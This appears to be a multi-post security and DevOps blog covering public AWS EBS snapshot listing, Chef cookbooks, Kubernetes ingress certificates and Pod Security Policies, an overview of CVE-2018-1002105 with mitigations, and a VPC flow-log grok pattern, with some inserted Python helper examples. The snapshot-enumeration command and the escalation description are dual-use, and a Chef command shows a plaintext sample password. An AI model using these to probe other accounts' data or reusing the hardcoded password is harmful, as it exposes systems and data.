Security Unplugged !!! Bit of Everything! Vulnerability Research, Reverse Engineering, Malware Analysis, Exploits etc... (Praveen D)<br />
<h2>
Listing AWS Public EBS Snapshots (2020-02-19)</h2>
<h4>
Create Volume Permissions</h4>
The create volume permissions fall into the following categories:<br />
<br />
o public : The owner of the snapshot granted create volume permissions for the snapshot to the all group. All AWS accounts have create volume permissions for these snapshots.<br />
<br />
o explicit : The owner of the snapshot granted create volume permissions to a specific AWS account.<br />
<br />
o implicit : An AWS account has implicit create volume permissions for all snapshots it owns.<br />
<br />
<h4>
--filters</h4>
o owner-alias - Value from an Amazon-maintained list (<b>amazon | self | all | aws-marketplace | microsoft</b>) of snapshot owners. Not to be confused with the user-configured AWS account alias, which is set from the IAM console.<br />
<br />
Run <b><i>aws ec2 describe-snapshots help</i></b> to see the help text for the command in scope.<br />
<br />
The command below lists public EBS snapshots:<br />
<span style="font-family: Courier New, Courier, monospace;">praveend$ aws ec2 describe-snapshots --profile pd-dev --region us-east-1 --output table --filters Name=owner-alias,Values=all</span><br />
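The listing above shows what everyone can see; the complementary check is whether any of your own snapshots fall into the "public" category described earlier. As an added example (not code from the original post), the boto3 script below walks the caller's own snapshots and classifies each one's createVolumePermission; it assumes AWS credentials and a profile/region in the environment, as for the aws CLI, and the sample API responses are constructed.

```python
"""Find EBS snapshots owned by this account that are shared publicly.

Added example, not part of the original post. Uses the EC2 DescribeSnapshots
and DescribeSnapshotAttribute calls through boto3; the live check needs AWS
credentials, the classification helpers run on constructed responses.
"""
from typing import Dict, Iterable, List


def classify_permission(attr: Dict) -> str:
    """Map a DescribeSnapshotAttribute response to public / explicit / implicit.

    These are the categories from the aws CLI help text: a 'Group': 'all' entry
    means every AWS account may create a volume from the snapshot, a 'UserId'
    entry is an explicit grant to one account, and no entries at all means only
    the owner has (implicit) permission.
    """
    perms = attr.get("CreateVolumePermissions", [])
    if any(p.get("Group") == "all" for p in perms):
        return "public"
    if any("UserId" in p for p in perms):
        return "explicit"
    return "implicit"


def public_snapshot_ids(attrs: Iterable[Dict]) -> List[str]:
    """Return the SnapshotIds whose createVolumePermission includes the 'all' group."""
    return [a["SnapshotId"] for a in attrs if classify_permission(a) == "public"]


def audit_account(profile: str = None, region: str = None) -> List[str]:
    """Walk the account's own snapshots and report the public ones (needs AWS access)."""
    import boto3  # imported here so the pure helpers above run without boto3 installed
    session = boto3.Session(profile_name=profile, region_name=region)
    ec2 = session.client("ec2")
    attrs = []
    for page in ec2.get_paginator("describe_snapshots").paginate(OwnerIds=["self"]):
        for snap in page["Snapshots"]:
            attrs.append(ec2.describe_snapshot_attribute(
                SnapshotId=snap["SnapshotId"], Attribute="createVolumePermission"))
    return public_snapshot_ids(attrs)


# Constructed sample responses in the shape DescribeSnapshotAttribute returns.
SAMPLE_ATTRS = [
    {"SnapshotId": "snap-0123456789abcdef0",
     "CreateVolumePermissions": [{"Group": "all"}]},            # public
    {"SnapshotId": "snap-0123456789abcdef1",
     "CreateVolumePermissions": [{"UserId": "123456789012"}]},  # explicit
    {"SnapshotId": "snap-0123456789abcdef2",
     "CreateVolumePermissions": []},                            # implicit
]

if __name__ == "__main__":
    for a in SAMPLE_ATTRS:
        print(a["SnapshotId"], classify_permission(a))
    # audit_account(profile="pd-dev", region="us-east-1") runs the live check
```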
<h2>
Testing/Writing Chef Cookbooks (2019-09-15)</h2>
<b>Writing cookbooks</b><br /><br />Cookbooks have attributes, recipes, templates, etc.<br /><br /><br /><b>Using Community cookbooks</b><br /><ol>
<li>Modify the Berksfile in the cookbook by adding the cookbook name, e.g. <span style="font-family: Courier New, Courier, monospace;">cookbook 'yum-centos', '~> 3.0.0'</span> </li>
<li>Modify metadata.rb in the cookbook by updating the dependencies, e.g. <span style="font-family: Courier New, Courier, monospace;">depends 'yum-centos', '~> 3.0.0'</span> </li>
<li>Execute the commands below </li>
</ol>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ berks install<br />$ berks upload</span></blockquote>
<b>Prerequisites</b><br /><br />Make sure the following configs/files exist<br /><ul>
<li>Chef cookbook </li>
<li>Chef Environment </li>
<li>Chef Role </li>
</ul>
<b>Testing cookbook locally</b><br /> <br /><ol>
<li>Install vagrant from <a href="https://www.vagrantup.com/downloads.html">https://www.vagrantup.com/downloads.html</a> </li>
<li>Install Virtualbox </li>
<li>Modify the .kitchen.yml file to reference the community cookbook recipe you want to test locally. </li>
<li>Go to the cookbook directory and run the kitchen commands to build, list, and log in to the newly created resource. </li>
</ol>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kitchen converge<br />$ kitchen list<br />$ kitchen login</span></blockquote>
<b>Update authentication key</b><br /><span style="font-family: Courier New, Courier, monospace;"># Connect to chef server</span><div>
<span style="font-family: Courier New, Courier, monospace;">[pd@ip-disects ~]$ ssh -A -t SSH_SERVER_IP<br /><br /># Following commands are executed on chef server<br />[pd@ip-disects ~]$ sudo chef-server-ctl user-create praveend Praveen Darshanam praveend@chef.io Myp@ssw0rd -f /tmp/praveend.key<br />ERROR: Conflict<br />Response: Username or email address already in use.<br /><br />[pd@ip-disects ~]$ sudo chef-server-ctl user-delete praveend<br />Do you want to delete the user praveend? (Y/N) y<br />Checking organization memberships...<br />Checking admin group memberships for 1 org(s).<br />FATAL: praveend is in the 'admins' group of the following organization(s):<br />- disects<br />Run this command again with the --remove-from-admin-groups option to remove the user from these admin group(s) automatically.<br /><br />[pd@ip-disects ~]$ sudo chef-server-ctl user-delete praveend --remove-from-admin-groups<br />Do you want to delete the user praveend? (Y/N) y<br />Checking organization memberships...<br />Checking admin group memberships for 1 org(s).<br />Removing praveend from admins group of 'disects'<br />Deleting user praveend.<br /><br />[pd@ip-disects ~]$ sudo chef-server-ctl user-create praveend Praveen Darshanam praveend@chef.io Myp@ssw0rd -f /tmp/praveend.key<br />[pd@ip-disects ~]$ sudo chef-server-ctl org-user-add disects praveend --admin<br />User praveend is added to admins and billing-admins group</span><br /><br />Upload the working cookbook to the chef server after local testing. Then test the cookbook on a cluster node to make sure everything works fine; this needs some experience though.<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ knife cookbook upload cookbook_name</span></blockquote>
</div>
<div>
<br /></div>
<div>
<br /></div>
<h2>
Kubernetes ingress custom Certificates with valid CA (2019-09-15)</h2>
Irrespective of the ingress FQDN, Kubernetes creates certificates with the domain name ingress.local, which causes the issues below.<br />
<ul>
<li>CoreOS Dex needs certificates from a valid CA; self-signed certificates will not work.</li>
<li>Gardener dashboard authentication has issues with self-signed certificates: the AuthN flow will not complete without accepting the invalid certificate error.</li>
<li>Accessing the ingress in any browser will complain about a self-signed server certificate.</li>
</ul>
<b>Fix</b>: Let's Encrypt<br /><br />Install <b>Certbot</b> from Let's Encrypt<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ brew install certbot</span></blockquote>
<br />Create a wildcard certificate for the domain <i><b>*.pd.example.com</b></i><br /><br />Before entering Yes to confirm, make sure you add the TXT record entry as prompted by certbot.<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;"># create directories named le_wd, le_cd, le_ld before executing the command below<br />$ certbot certonly --manual -d *.pd.example.com --work-dir=le_wd --config-dir=le_cd --logs-dir=le_ld </span></blockquote>
<br />
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;"># Check if certificates are created<br />$ certbot certificates --work-dir=le_wd --config-dir=le_cd --logs-dir=le_ld</span></blockquote>
<div>
<br />The certificates are located at le_cd/live/pd.example.com/<br /><br /><br />Create a TLS secret with the certificates we want to use<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kubectl create secret tls pd-custom-certs --key pd.example.com.key --cert pd.example.com.crt -n namespace_of_interest</span></blockquote>
<br /><br />Configure the ingress with the TLS secret.<br /><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">----SNIP(FQDN 1)----
ingress:
  enabled: true
  path: /
  hosts:
    - a.pd.example.com
  tls:
    - hosts:
        - a.pd.example.com
      secretName: pd-custom-certs
----SNIP(FQDN 2)----
ingress:
  enabled: true
  path: /
  hosts:
    - b.pd.example.com
  tls:
    - secretName: pd-custom-certs
      hosts:
        - b.pd.example.com</span><br /><br />Accessing the ingress should not show invalid certificate errors now.<br /></div>
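A wildcard certificate only removes the browser and Dex errors if every host in the ingress tls sections is actually covered by it. As an added example (not from the original post), the check below applies the one-label wildcard rule that TLS clients enforce (RFC 6125) to the two ingress values blocks above; the ingress dicts and the certificate's DNS name list are transcribed from the post.

```python
"""Check that every ingress TLS host is covered by the wildcard certificate.

Added example, not from the original post. '*.pd.example.com' covers
a.pd.example.com but neither pd.example.com nor x.a.pd.example.com, so a host
that slips through here would still raise a certificate error even though the
certificate itself comes from a valid CA.
"""
from typing import Dict, List

# DNS names in the certbot-issued certificate from the post.
CERT_DNS_NAMES = ["*.pd.example.com"]

# The two ingress values blocks from the post, reduced to the relevant fields
# (plain dicts so the check does not need PyYAML).
INGRESS_VALUES = {
    "fqdn1": {"hosts": ["a.pd.example.com"],
              "tls": [{"hosts": ["a.pd.example.com"], "secretName": "pd-custom-certs"}]},
    "fqdn2": {"hosts": ["b.pd.example.com"],
              "tls": [{"secretName": "pd-custom-certs", "hosts": ["b.pd.example.com"]}]},
}


def name_matches(pattern: str, hostname: str) -> bool:
    """True if a certificate DNS name (optionally '*.'-prefixed) covers hostname."""
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if not pattern.startswith("*."):
        return pattern == hostname
    suffix = pattern[1:]                      # ".pd.example.com"
    if not hostname.endswith(suffix):
        return False
    wildcard_part = hostname[: -len(suffix)]  # the labels the '*' would stand for
    # The wildcard must stand for exactly one non-empty label.
    return bool(wildcard_part) and "." not in wildcard_part


def uncovered_hosts(values: Dict, cert_names: List[str]) -> List[str]:
    """Hosts listed under tls: in the ingress values that no certificate name covers."""
    missing = []
    for ingress in values.values():
        for tls_entry in ingress.get("tls", []):
            for host in tls_entry.get("hosts", []):
                if not any(name_matches(name, host) for name in cert_names):
                    missing.append(host)
    return missing


if __name__ == "__main__":
    print("uncovered:", uncovered_hosts(INGRESS_VALUES, CERT_DNS_NAMES))  # []
```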
<h2>
Kubernetes Pod Security Policies (2019-09-15)</h2>
Start minikube with RBAC and the admission plugins enabled<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ minikube start --extra-config=apiserver.authorization-mode=Node,RBAC --extra-config=apiserver.enable-admission-plugins=PodSecurityPolicy<br /># or<br />$ minikube start --extra-config=apiserver.authorization-mode=Node,RBAC --extra-config=apiserver.Admission.PluginNames=PodSecurityPolicy</span></blockquote>
<div>
<br />These commands are not working on my Mac machine; it looks like an API Server issue as it is not accepting any requests (it might not be up). <br /><br />Create a namespace and a Service Account<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kubectl create namespace praveend-psp<br />$ kubectl create sa test-psp-sa -n praveend-psp</span></blockquote>
<br /><b>Policy definitions</b><br /><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">$ cat praveend_psp.yaml
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
  name: praveend-psp
spec:
  privileged: false  # Don't allow privileged pods!
  # The rest fills in some required fields.
  allowPrivilegeEscalation: false
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
  volumes:
    - '*'
$ cat clusterR.yaml
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: psp-test-cr
rules:
  # PodSecurityPolicy is served by the 'policy' API group (and the legacy
  # 'extensions' group), not the core "" group, so the 'use' verb has to be
  # granted there or the binding has no effect.
  - apiGroups: ["policy"]
    resources: ["podsecuritypolicies"]
    resourceNames:
      - praveend-psp
    verbs:
      - use
$ cat clusterRB.yaml
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: cluster-admin-rb
roleRef:
  kind: ClusterRole
  name: psp-test-cr
  apiGroup: rbac.authorization.k8s.io
subjects:
  # Authorize specific service accounts:
  - kind: ServiceAccount
    name: test-psp-sa
    namespace: praveend-psp</span></div>
<div>
<br /><br />Create the PodSecurityPolicy, ClusterRole and ClusterRoleBinding. A ClusterRoleBinding binds a ClusterRole/Role to subjects such as a Service Account, User or Group.<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kubectl create -f praveend_psp.yaml -n praveend-psp </span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: "Courier New", Courier, monospace;">$ kubectl create -f clusterR.yaml -n praveend-psp </span></blockquote>
<blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kubectl create -f clusterRB.yaml -n praveend-psp</span></blockquote>
</div>
<div>
<br />Check whether we have permission to use the PodSecurityPolicy in the <i>praveend-psp</i> namespace (add <i>--as=system:serviceaccount:praveend-psp:test-psp-sa</i> to check for the service account instead of the current user)<br /><blockquote class="tr_bq">
<span style="font-family: Courier New, Courier, monospace;">$ kubectl auth can-i use podsecuritypolicy/praveend-psp -n praveend-psp</span></blockquote>
<br />Create a Pod in the <i>test-psp-minikube</i> namespace<br /><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">$ kubectl -n test-psp-minikube create -f- &lt;&lt;EOF
apiVersion: v1
kind: Pod
metadata:
  name: pause
spec:
  containers:
    - name: pause
      image: k8s.gcr.io/pause
EOF</span><br /><br /><br />Create a privileged Pod in the <i>praveend-psp</i> namespace<br /><span style="background-color: white; color: #333333; font-family: monospace; font-size: 14px; white-space: pre;">$ kubectl -n test-psp-minikube create -f- &lt;&lt;EOF
apiVersion: v1
kind: Pod
metadata:
  name: pause
spec:
  containers:
    - name: pause
      image: k8s.gcr.io/pause
      securityContext:
        privileged: true
EOF</span><br /><br /><br /><b>References</b><br /><ol>
<li><a href="https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/">https://kubernetes.io/docs/reference/command-line-tools-reference/kube-apiserver/</a></li>
<li><a href="https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#how-do-i-turn-on-an-admission-control-plug-in">https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#how-do-i-turn-on-an-admission-control-plug-in</a></li>
<li><a href="https://kubernetes.io/docs/concepts/policy/pod-security-policy/">https://kubernetes.io/docs/concepts/policy/pod-security-policy/</a></li>
</ol>
<br /></div>
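To see why the plain pause pod is admitted and the privileged one is rejected without a running cluster, here is an added example (not the post's own code): a Python simulation of the two checks that matter for this policy, the PSP admission decision on the privileged and allowPrivilegeEscalation fields and the RBAC test for the 'use' verb that the ClusterRole grants. The policy, rule and pod dicts are transcribed from the post; the defaulting behaviour for unset fields follows the PSP admission plugin's documented semantics.

```python
"""Simulate what praveend-psp and its RBAC wiring decide for a pod.

Added example, not part of the original post. Covers only the two fields the
post's policy constrains (privileged, allowPrivilegeEscalation) plus the RBAC
'use' check; the dicts below are the post's objects written as Python.
"""
from typing import Dict, List, Tuple

# The policy from the post (extensions/v1beta1 PodSecurityPolicy praveend-psp).
PRAVEEND_PSP = {"privileged": False, "allowPrivilegeEscalation": False}

# The post's ClusterRole rule. PodSecurityPolicy lives in the 'policy' (and
# legacy 'extensions') API group, never in the core "" group.
PSP_USE_RULE = {"apiGroups": ["policy"], "resources": ["podsecuritypolicies"],
                "resourceNames": ["praveend-psp"], "verbs": ["use"]}

PAUSE_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "pause"},
             "spec": {"containers": [{"name": "pause", "image": "k8s.gcr.io/pause"}]}}

PRIVILEGED_POD = {"apiVersion": "v1", "kind": "Pod", "metadata": {"name": "pause"},
                  "spec": {"containers": [{"name": "pause", "image": "k8s.gcr.io/pause",
                                           "securityContext": {"privileged": True}}]}}


def rule_allows_use(rule: Dict, psp_name: str) -> bool:
    """RBAC: does this rule grant the 'use' verb on podsecuritypolicies/<psp_name>?"""
    groups_ok = any(g in ("policy", "extensions", "*") for g in rule.get("apiGroups", []))
    resource_ok = any(r in ("podsecuritypolicies", "*") for r in rule.get("resources", []))
    verb_ok = any(v in ("use", "*") for v in rule.get("verbs", []))
    names = rule.get("resourceNames", [])
    name_ok = not names or psp_name in names  # no resourceNames means every PSP
    return groups_ok and resource_ok and verb_ok and name_ok


def admit(pod: Dict, psp: Dict) -> Tuple[bool, List[str]]:
    """Return (admitted, reasons) for the two fields this policy constrains.

    privileged: true is rejected outright when the policy forbids it. For
    allowPrivilegeEscalation the plugin is mutating: a container that leaves the
    field unset is defaulted to false and admitted; only an explicit
    allowPrivilegeEscalation: true is rejected.
    """
    reasons = []
    containers = pod["spec"].get("initContainers", []) + pod["spec"].get("containers", [])
    for c in containers:
        sc = c.get("securityContext") or {}
        if sc.get("privileged", False) and not psp["privileged"]:
            reasons.append(f"container {c['name']}: privileged containers are not allowed")
        if sc.get("allowPrivilegeEscalation") is True and not psp["allowPrivilegeEscalation"]:
            reasons.append(f"container {c['name']}: allowing privilege escalation is not allowed")
    return (not reasons, reasons)


def decide(pod: Dict, psp: Dict, rule: Dict, psp_name: str) -> Tuple[bool, List[str]]:
    """Full decision: the requester must be allowed to use the PSP, then the pod must pass it."""
    if not rule_allows_use(rule, psp_name):
        return (False, [f"no RBAC rule grants 'use' on podsecuritypolicies/{psp_name}"])
    return admit(pod, psp)


if __name__ == "__main__":
    for pod in (PAUSE_POD, PRIVILEGED_POD):
        ok, why = decide(pod, PRAVEEND_PSP, PSP_USE_RULE, "praveend-psp")
        print(pod["metadata"]["name"], "admitted" if ok else "rejected", why)
```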
<h2>
Kubernetes Privilege Escalation (CVE-2018-1002105) (2018-12-07)</h2>
<h2>
Introduction</h2>
Kubernetes is an open-source, production-grade container orchestration system for deploying and managing Docker/container applications. There are managed Kubernetes services such as Amazon Elastic Container Service for Kubernetes (EKS) and Azure Kubernetes Service (AKS).<br />
<br />
<h2>
kubectl</h2>
Kubernetes cluster users perform management tasks with the kubectl binary, which talks to the API Server. Example kubectl commands:<br />
<br />
# display pod resource<br />
<span style="font-family: Courier New, Courier, monospace;">kubectl get pods -n my_namespace</span><br />
<br />
# Execute a command in a container<br />
<span style="font-family: Courier New, Courier, monospace;">kubectl -n my_namespace exec -it pods_name -- sh</span><br />
<br />
# Listen on ports 5000 and 6000 locally, forwarding data to/from ports 5000 and 6000 in the pod<br />
<span style="font-family: Courier New, Courier, monospace;">kubectl -n my_namespace port-forward pod/mypod 5000 6000</span><br />
<br />
# Get output from ruby-container from pod my-pod-pd<br />
<span style="font-family: Courier New, Courier, monospace;">kubectl attach my-pod-pd -c ruby-container</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihAvBa11RMj6as0B3ZZMvLbw6efhYVTS4mHfvnnEdU05RR3m_t2WLQyGwMqaCKYhzmGMLMPgYrRsTtH7Ktwr_-p1ypA79En85UMzLOy-rS726Wry29AV-HdRKYbMmjrZHLL9YJZcGBxewk/s1600/k8s_simple.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="359" data-original-width="638" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEihAvBa11RMj6as0B3ZZMvLbw6efhYVTS4mHfvnnEdU05RR3m_t2WLQyGwMqaCKYhzmGMLMPgYrRsTtH7Ktwr_-p1ypA79En85UMzLOy-rS726Wry29AV-HdRKYbMmjrZHLL9YJZcGBxewk/s640/k8s_simple.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">kubectl execution flow (source: 1ambda.github.io)</td></tr>
</tbody></table>
<span style="font-family: "times" , "times new roman" , serif;"><br /></span>
<br />
<h2>
<span style="font-family: "times" , "times new roman" , serif;">kubelet</span></h2>
kubelet and kube-proxy run on each compute node (VM, worker, EC2 instance, etc.). kubelet listens on TCP ports 10250 and 10255 (with no authentication/authorization). The API Server acts as a reverse proxy to the kubelet and to aggregated APIs. The API Server connects to the kubelet to fulfil commands like exec and port-forward, and opens a websocket connection which connects stdin, stdout, or stderr to the user's original call [01].<br />
<div class="p1">
<br /></div>
<h2>
API Aggregation</h2>
Installing or writing additional APIs into the Kubernetes API Server, i.e. extending the core API Server.<br />
<br />
<h2>
Vulnerability</h2>
<div>
The vulnerability is in the Kubernetes API Server: a crafted request can execute arbitrary commands on the backend servers (pods) through the same channel the client established to the backend via the API Server [02]</div>
<div>
<br /></div>
<div>
Check the nodes' Kubernetes version</div>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small; white-space: pre;">$ kubectl get nodes -o wide
NAME           STATUS   ROLES   AGE   VERSION   INTERNAL-IP   EXTERNAL-IP   OS-IMAGE                                        KERNEL-VERSION      CONTAINER-RUNTIME
pd-worker-01   Ready    node    13d   v1.12.3   10.250.0.6    &lt;none&gt;        Container Linux by CoreOS 1745.7.0 (Rhyolite)   4.14.48-coreos-r2   docker://18.3.1
pd-worker-02   Ready    node    13d   v1.12.3   10.250.0.5    &lt;none&gt;        Container Linux by CoreOS 1745.7.0 (Rhyolite)   4.14.48-coreos-r2   docker://18.3.1
pd-worker-03   Ready    node    13d   v1.12.3   10.250.0.4    &lt;none&gt;        Container Linux by CoreOS 1745.7.0 (Rhyolite)   4.14.48-coreos-r2   docker://18.3.1</span><br />
<br />
<h2>
Vulnerable API Servers</h2>
If the API server response looks as below and you are running a vulnerable version of Kubernetes, you are exposed to the anonymous-user escalation; patch Kubernetes immediately.<br />
HTTP response code 403 indicates Forbidden, i.e. it relates to <i>Authorization</i>, which implies the request successfully passed through the <i>Authentication</i> phase.<br />
<span style="background-color: #f4f5f7; color: #172b4d; font-family: monospace; font-size: 12px; white-space: pre;">{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {
  },
  "status": "Failure",
  "message": "forbidden: User \"system:anonymous\" cannot get path \"/api/v1/\"",
  "reason": "Forbidden",
  "details": {
  },
  "code": 403
}</span><br />
<br />
<br />
<h4>
anonymous user</h4>
By default, requests to the kubelet’s HTTPS endpoint that are not rejected by other configured authentication methods are treated as anonymous requests, and given a username of <i>system:anonymous</i> and a group of <i>system:unauthenticated</i>.<br />
<br />
<h2>
Mitigations</h2>
There are three escalation paths, each with its own mitigation:<br />
<h3>
1. anonymous user -> aggregated API server</h3>
<div>
Make sure the API Server's <i>anonymous-auth</i> parameter is set to false:</div>
<div>
<span style="font-family: Courier New, Courier, monospace;">$ kubectl get po kube-apiserver-01 -n prod -o yaml | grep -i "anonymous-auth"<br />- --anonymous-auth=false</span><br />
<span style="font-family: Courier New, Courier, monospace;">$ kubectl get po kube-apiserver-01 -n stage -o yaml | grep -i "anonymous-auth"<br />- --anonymous-auth=false</span></div>
<h3>
2. authenticated user -> aggregated API server</h3>
Suspend the use of aggregated API servers<br />
<h3>
3. authorized pod exec/attach/portforward -> kubelet API</h3>
Remove pod exec/attach/portforward permissions from users<br />
<h2>
References</h2>
[01]. https://docs.openshift.com/container-platform/3.11/architecture/networking/remote_commands.html<br />
[02]. https://docs.openshift.com/container-platform/3.11/architecture/networking/remote_commands.html<br />
[03]. https://elastisys.com/2018/12/04/kubernetes-critical-security-flaw-cve-2018-1002105/<br />
[04]. https://github.com/kubernetes/kubernetes/issues/71411<br />
<br />
Praveen Dhttp://www.blogger.com/profile/17038388927215157898noreply@blogger.com9tag:blogger.com,1999:blog-1852980805947568568.post-90277410550873993312018-01-20T06:37:00.002+05:302018-01-20T06:40:37.273+05:30AWS VPC Flow Logs grok Pattern<br />
Amazon Web Services (AWS) can generate VPC flow logs in the format below<br />
<span style="font-family: "courier new" , "courier" , monospace;">2 123456789010 eni-abc123de 172.31.9.69 172.31.9.12 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK</span><br />
<br />
For more information on flow logs and the grok filter plugin, refer to the links below<br />
<a href="https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/flow-logs.html">https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/flow-logs.html</a><br />
<a href="https://www.elastic.co/guide/en/logstash/current/plugins-filters-grok.html">https://www.elastic.co/guide/en/logstash/current/plugins-filters-grok.html</a><br />
<br />
grok patterns can be tested using the links below<br />
<a href="http://grokdebug.herokuapp.com/">http://grokdebug.herokuapp.com</a><br />
<a href="http://grokconstructor.appspot.com/do/match#result">http://grokconstructor.appspot.com/do/match#result</a><br />
<br />
<span style="font-family: Courier New, Courier, monospace;">%{NONNEGINT:version} %{NONNEGINT:accountid} %{NOTSPACE:interface-id} %{NOTSPACE:srcaddr} %{NOTSPACE:dstaddr} %{NONNEGINT:srcport} %{NONNEGINT:dstport} %{NONNEGINT:protocol} %{NONNEGINT:packets} %{NONNEGINT:bytes} %{NONNEGINT:starttime} %{NONNEGINT:endtime} %{NOTSPACE:action} %{NOTSPACE:log-status}</span><br />
<br />
Test using grokdebugger<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFtdQybmp0yqures-I7gyP4QoO1IfgSsTo7CrcoGcQvccm4_Memhu9hKYggo3Ekd7pKhqGBrkxo6ccoS-A_zKaEHJ4WMkJsaZVhey4t6SinQ7wXuu6LZv8rgtLJWgOf9c2rgQ9KZE5ZRYw/s1600/grokdebug_mine.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1492" data-original-width="1566" height="380" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFtdQybmp0yqures-I7gyP4QoO1IfgSsTo7CrcoGcQvccm4_Memhu9hKYggo3Ekd7pKhqGBrkxo6ccoS-A_zKaEHJ4WMkJsaZVhey4t6SinQ7wXuu6LZv8rgtLJWgOf9c2rgQ9KZE5ZRYw/s400/grokdebug_mine.png" width="400" /></a></div>
<br />
Test using grokconstructor<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyUZtQSg0vMT5HZQPg8E2J7UNO7qOf_kBGLhbC3bX8_1fqqhbarUZR9nVEv7u_APWR8eApvvS4Dn01rDBrTbKBOP7sLrUABn4yg7p7S_I4BUMJP3n59BTsImZpY1BU5EVWB_w5FM35Hb6_/s1600/grokconstructor_mine.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1327" data-original-width="1600" height="331" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjyUZtQSg0vMT5HZQPg8E2J7UNO7qOf_kBGLhbC3bX8_1fqqhbarUZR9nVEv7u_APWR8eApvvS4Dn01rDBrTbKBOP7sLrUABn4yg7p7S_I4BUMJP3n59BTsImZpY1BU5EVWB_w5FM35Hb6_/s400/grokconstructor_mine.png" width="400" /></a></div>
<br />
You can also use INT instead of NONNEGINT for the numeric fields<br />
<br />
<br />
I found a few patterns by googling which looked like the one below; they were not working on the grokconstructor website.<br />
<span style="font-family: Courier New, Courier, monospace;">%{NUMBER:version} %{NUMBER:account-id} %{NOTSPACE:interface-id} %{NOTSPACE:srcaddr} %{NOTSPACE:dstaddr} %{NOTSPACE:srcport:int} %{NOTSPACE:dstport:int} %{NOTSPACE:protocol:int} %{NOTSPACE:packets:int} %{NOTSPACE:bytes:int} %{NUMBER:start:int} %{NUMBER:end:int} %{NOTSPACE:action} %{NOTSPACE:log-status}</span><br />
<br />
Tested on grokdebugger<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz1uUTqbwflI21ZeDgfFscE9boAEx7eu1AfsfTG8htBU8U_fjkRAMRAIyhiaj5yAiGmg03HCgRprJsHuxTKUT2nDi-glgeAL3tT19O-BVbsluOgalaaEeyLco-3zoAmcw6BTfW3JO-Npcr/s1600/grokdebug_googling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1514" data-original-width="1550" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhz1uUTqbwflI21ZeDgfFscE9boAEx7eu1AfsfTG8htBU8U_fjkRAMRAIyhiaj5yAiGmg03HCgRprJsHuxTKUT2nDi-glgeAL3tT19O-BVbsluOgalaaEeyLco-3zoAmcw6BTfW3JO-Npcr/s400/grokdebug_googling.png" width="400" /></a></div>
<br />
<br />
Tested on grokconstructor<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXiy4ouo9AwfMKdlhppsOqBonH6pb9CuffC2aGEmFEiHoSh1y_LtQAuPfE2GHIEQE1FYtKrTeAxWvsmkXbPsFHjB6tYMIiQQ87woY2-JC-RkjACVGzeNzLaehwVFgeeRJEoT40Exh4qAIh/s1600/grokconstructor_googling.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1332" data-original-width="1600" height="266" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXiy4ouo9AwfMKdlhppsOqBonH6pb9CuffC2aGEmFEiHoSh1y_LtQAuPfE2GHIEQE1FYtKrTeAxWvsmkXbPsFHjB6tYMIiQQ87woY2-JC-RkjACVGzeNzLaehwVFgeeRJEoT40Exh4qAIh/s320/grokconstructor_googling.png" width="320" /></a></div>
<div>
<br /></div>
<div>
We can use the fields extracted by the grok filter plugin in Kibana searches, or enrich the data using the logstash filter plugins geoip, dns, date etc.</div>
<div>
<br /></div>
